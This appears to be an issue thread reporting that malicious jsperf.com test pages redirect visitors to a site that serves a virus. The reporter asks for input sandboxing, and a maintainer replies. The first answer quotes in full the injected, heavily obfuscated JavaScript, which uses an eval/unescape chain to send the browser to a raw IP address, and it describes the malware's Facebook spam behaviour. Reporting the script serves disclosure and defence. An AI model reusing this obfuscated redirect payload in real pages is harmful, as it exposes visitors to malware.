Sanitize to prevent malicious tests

Question

Sanitize to prevent malicious tests

Closed this issue 10 years ago · 2 comments

In the list of "popular tests" there are currently two which instantly redirects you to a malicious website which tries to download a virus. Here is one of them http://jsperf.com/f4efa8skena (please turn off javascript before visiting).

User input should be sandboxed (eg. with an iframe sandbox) and/or sanitized when submitted to prevent this from happening again.

Answer 1 · 2014-11-04T15:52:55.000Z

Here is the actual script:

<script>
rSfhmMxP=new Array(document,eval,unescape,window);WCpPAlGt=function(RMHGVngm,MgNgqvCq,JmjWsPBP){if(5%2){return '%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%64%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%20%63%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%7B%64%5B%63%5D%3D%6B%5B%63%5D%7C%7C%63%7D%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%64%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%7B%69%66%28%6B%5B%63%5D%29%7B%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%7D%7D%72%65%74%75%72%6E%20%70%7D%28%27%31%33%20%33%3D%5B%22%5C%5C%37%5C%5C%31%31%5C%5C%31%36%5C%5C%31%38%22%2C%22%5C%5C%31%37%5C%5C%38%5C%5C%31%35%5C%5C%31%39%5C%5C%36%5C%5C%31%34%5C%5C%38%5C%5C%31%32%22%2C%22%5C%5C%37%5C%5C%36%5C%5C%36%5C%5C%32%34%5C%5C%32%37%5C%5C%34%5C%5C%34%5C%5C%39%5C%5C%32%30%5C%5C%31%30%5C%5C%35%5C%5C%32%36%5C%5C%32%35%5C%5C%35%5C%5C%32%31%5C%5C%35%5C%5C%39%5C%5C%32%32%5C%5C%31%30%5C%5C%34%22%5D%3B%32%33%5B%33%5B%31%5D%5D%5B%33%5B%30%5D%5D%3D%33%5B%32%5D%3B%27%2C%31%30%2C%32%38%2C%27%7C%7C%7C%5F%30%78%38%30%63%64%7C%78%32%46%7C%78%32%45%7C%78%37%34%7C%78%36%38%7C%78%36%46%7C%78%33%31%7C%78%33%38%7C%78%37%32%7C%78%36%45%7C%76%61%72%7C%78%36%39%7C%78%36%33%7C%78%36%35%7C%78%36%43%7C%78%36%36%7C%78%36%31%7C%78%33%37%7C%78%33%30%7C%78%33%36%7C%74%6F%70%7C%78%37%30%7C%78%33%32%7C%78%33%33%7C%78%33%41%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%0A'}else{return EPLHAkSt}};HkVVpObe=function(RLZtUoBA,rwQV_tjH,EPLHAkSt){return WCpPAlGt()};mfebnKSC=function(WwoRJvKN){DPHoLbTh(WwoRJvKN)};ck_e_KpF=function(NMAqPYVY,oRdhNQTf,rOEAglqm){if(9%3)return eTGHYLSr(rOEAglqm);if(5%2)return eTGHYLSr(oRdhNQTf);return NMAqPYVY;};rSfhmMxP[11%2-1]=rSfhmMxP[5%2];DPHoLbTh=rSfhmMxP[10%5];rSfhmMxP[10%5]=rSfhmMxP[10%8*3-4];eTGHYLSr=rSfhmMxP[14%2];rSfhmMxP[2]=rSfhmMxP[3];mfebnKSC(ck_e_KpF(WCpPAlGt(),HkVVpObe()));
</script>

All it does is redirect the browser to the url 'http://178.32.0.168/ which contains the actual virus. The virus installs browser plugins to spam more links to this virus on Facebook. It also visits the malicious jsperf-tests to make them more "popular".

Answer 2 · 2014-11-04T18:19:38.000Z

We're aware of the issue and remove them when spotted. Unfortunately we can't give people a tool without folks abusing it. There is discussion over at #194 on ways to stop it.